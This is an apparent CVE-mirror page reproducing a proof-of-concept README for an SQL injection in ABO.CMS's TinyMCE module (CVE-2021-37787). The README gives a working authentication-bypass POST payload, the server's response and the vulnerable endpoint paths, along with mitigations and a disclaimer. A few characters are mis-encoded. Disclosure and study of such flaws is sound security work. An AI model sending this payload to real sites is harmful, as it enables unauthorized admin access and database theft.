Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-37787 PoC — ABO.CMS 安全漏洞

Source
https://github.com/vasykor/CVE-2021-37787
Associated Vulnerability
Title:ABO.CMS 安全漏洞 (CVE-2021-37787)
Description:ABO.CMS是ABO.CMS公司的一个内容管理平台。 ABO.CMS 5.8至5.9.3版本存在安全漏洞,该漏洞源于通过HTTP POST请求向TinyMCE模块发送的SQL注入攻击。
Description
CVE-2021-37787
Readme
��# CVE-2021-37787: SQL Injection in ABOCMS via TinyMCE Module



## Vulnerability Details



- **CVE ID**: CVE-2021-37787

- **Product**: ABOCMS

- **Affected Version(s)**: 5.8.x, d"5.9.3

- **Vulnerability Type**: SQL Injection

- **CVSS Score**: 9.8



### Description



A critical SQL injection vulnerability exists in ABOCMS within the TinyMCE module. The vulnerability arises due to insufficient input sanitization in the TinyMCE module's interaction with the database, allowing an attacker to inject malicious SQL queries. This can lead to unauthorized data access, modification, or even full compromise of the underlying database.



The vulnerable endpoint is located in the TinyMCE module's processing of user-supplied input. An attacker can exploit this flaw to execute arbitrary SQL commands.



### Impact



- Aunthentication bypass.

- Extraction of sensitive data.

- Modification or deletion of database records.

- Potential remote code execution, depending on the database configuration.



## Proof of Concept (PoC)



## POST Request



```

POST /js/admin/tiny_mce/plugins/imagemanager/login_session_auth.php HTTP/1.1

Host: <yourdomain.name>

Content-Type: application/x-www-form-urlencoded



return_url=%2Fjs%2Fadmin%2Ftiny_mce%2Fplugins%2Fimagemanager%2Findex.php%3Ftype%3Dim%26page%3Dindex.html&login=1%27+OR+%271%27%3D1+%23&password=1&submit_button=Login

```



## Response



```

HTTP/1.1 302 Found

Server: nginx-reuseport/1.21.1

Date: <date>

Content-Type: text/html; charset=utf-8

Content-Length: 0

Connection: keep-alive

Keep-Alive: timeout=30

X-Powered-By: PHP/5.6.40

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

A-Powered-By: ABO.CMS 5.9.3 (fe01ce2a7fbac8fafaed7c982a04e229)

location: /js/admin/tiny_mce/plugins/imagemanager/index.php?type=im&page=index.html

```



### Vulnerable Endpoint



The vulnerability can be triggered via the following endpoint:



/js/admin/tiny_mce/plugins/imagemanager/login_session_auth.php

/js/admin/tiny_mce/plugins/filemanager/login_session_auth.php



## Mitigation



- **For Users**:

  - Upgrade to the latest version of ABOCMS.

  - Disable the TinyMCE module if it s not essential.



- **For Developers**:

  - Use prepared statements or parameterized queries to interact with the database.

  - Update the TinyMCE module to the latest secure version.

  - Implement proper input validation to filter out malicious payloads.



## Disclaimer



This PoC is provided for educational and security research purposes only. Do not use this code to harm systems or networks without explicit permission from the owner. The author is not responsible for any misuse or damage caused by this PoC.
File Snapshot

 [4.0K]  /data/pocs/11e3508865ee2a8f842e0c54b7c32e52c9db3072
└── [5.4K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.